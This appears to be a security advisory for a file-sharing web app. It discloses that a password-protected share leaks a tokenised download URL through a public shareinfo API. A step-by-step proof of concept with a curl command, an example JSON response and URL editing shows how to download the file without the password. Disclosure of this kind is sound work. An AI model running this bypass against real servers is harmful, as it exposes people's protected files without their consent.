Summary

When you make a share on a file with a password, people can completely bypass the password and still download the file.

Details

This happens because the API returns a direct download link in the details of the share, which is accessible to anyone with JUST THE SHARE LINK, even without the password.

PoC

1. As an authenticated user, create a share for a file, with a password specified in "Optional password" (make sure to allow anonymous access as the PoC doesn't explain how to do this on a share that requires login, but it is also possible to do on a share that requires login, with some small tweaks to the API request)
2. Copy the first link (the clipboard WITHOUT an arrow) because the second one just completely skips the password without any effort required, which was mentioned in another vulnerability (GHSA-3v48-283x-f2w4)

Now, the link you copied should look like:
https://yourdomain/public/share/yoursharehash
example:
https://example.com/public/share/ngCZzArOyFHUQBmfbvP-pA

Now, make a API request with any api client to GET
https://yourdomain/public/api/shareinfo?hash=(the share hash from the link)
example:
https://example.com/public/api/shareinfo?hash=ngCZzArOyFHUQBmfbvP-pA

If you like using curl, a command line based API client, here's the command:
curl 'https://yourdomain/public/api/shareinfo?hash=yoursharehash' -H 'Accept: */*'
example:
curl 'https://example.com/public/api/shareinfo?hash=ngCZzArOyFHUQBmfbvP-pA' -H 'Accept: */*'

Example response:

{
    "shareTheme": "default",
    "title": "Shared files - IMG_20240814_213703451.jpg",
    "description": "A share has been sent to you to view or download.",
    "disableSidebar": false,
    "source": "/folder",
    "path": "/IMG_20240814_213703451.jpg/",
    "downloadURL": "https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA\u0026token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D",
    "shareURL": "https://example.com/public/share/ngCZzArOyFHUQBmfbvP-pA",
    "enforceDarkLightMode": "default",
    "viewMode": "normal",
    "shareType": "normal",
    "sidebarLinks": [
        {
            "name": "Share QR Code and Info",
            "category": "shareInfo",
            "target": "#",
            "icon": "qr_code"
        },
        {
            "name": "Download",
            "category": "download",
            "target": "#",
            "icon": "download"
        }
    ],
    "hasPassword": true
}

Now, see that downloadURL? well almost done. It encodes the "&" symbol as "\u0026" so just replace "\u0026" with "&", example:
https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA\u0026token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D
should be changed to:
https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA&token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D

Then just copy paste your new link (example: https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA&token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D) into any browser of your choice, and the file will download. All without giving a password.

Impact

This affects anyone who believes their file shares are secure by protecting them with a password, because they actually aren't as explained by this report.